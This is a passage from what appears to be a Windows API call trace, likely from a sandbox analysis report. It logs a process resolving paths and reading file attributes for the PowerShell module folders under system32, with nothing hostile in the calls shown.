fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x19ec84e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20706767, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.923] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0218.924] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", nBufferLength=0x4a, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement", lpFilePart=0x0) returned 0x49 [0218.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.924] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a636cb, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.924] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0218.924] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", nBufferLength=0x41, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0218.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.924] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a63ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.925] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0218.925] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", nBufferLength=0x39, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0218.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.925] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a648ba, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.926] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0218.926] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0218.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.927] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a65091, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.927] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0218.927] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", nBufferLength=0x37, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds", lpFilePart=0x0) returned 0x36 [0218.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.927] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a65832, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.928] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0218.928] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0218.928] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.928] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a6609c, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.928] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0218.928] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0218.929] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.929] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a67503, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.929] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.930] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0218.930] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0218.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.930] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a67e99, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.930] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0218.931] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0218.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.931] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1a686f1, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2072c9cd, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.932] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0218.932] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0218.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.932] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1ac9e27, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.932] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0218.932] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0218.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.932] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acae81, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.933] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0218.933] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0218.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.933] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acb52e, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.934] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0218.934] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0218.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.934] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acc005, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x20752c33, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.935] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0218.935] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", nBufferLength=0x39, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc", lpFilePart=0x0) returned 0x38 [0218.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.935] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acdc29, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x8d025724, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.936] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MSMQ", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0218.936] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MSMQ", nBufferLength=0x38, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MSMQ", lpFilePart=0x0) returned 0x37 [0218.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.936] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MSMQ" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msmq"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x243555cf, ftLastAccessTime.dwHighDateTime=0x1d32773, ftLastWriteTime.dwLowDateTime=0x243555cf, ftLastWriteTime.dwHighDateTime=0x1d32773, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.979] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0218.979] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", nBufferLength=0x3e, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter", lpFilePart=0x0) returned 0x3d [0218.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.979] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1acff90, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2079f100, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.980] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0218.980] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", nBufferLength=0x41, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection", lpFilePart=0x0) returned 0x40 [0218.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.980] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1bb671a, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x2079f100, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.981] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0218.981] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", nBufferLength=0x49, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture", lpFilePart=0x0) returned 0x48 [0218.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.981] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: lpFileInformation=0x933ea64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18586290, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1bb70fa, ftLastAccessTime.dwHighDateTime=0x1d47ca4, ftLastWriteTime.dwLowDateTime=0x207c536a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0218.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x933e9e4) returned 1 [0218.981] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0218.981] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", nBufferLength=0x3b, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo", lpFilePart=0x0) returned 0x3a [0218.982] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x933e9e8) returned 1 [0218.982] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo"), fInfoLevelId=0x0, lpFileInformation=0x933ea64 | out: 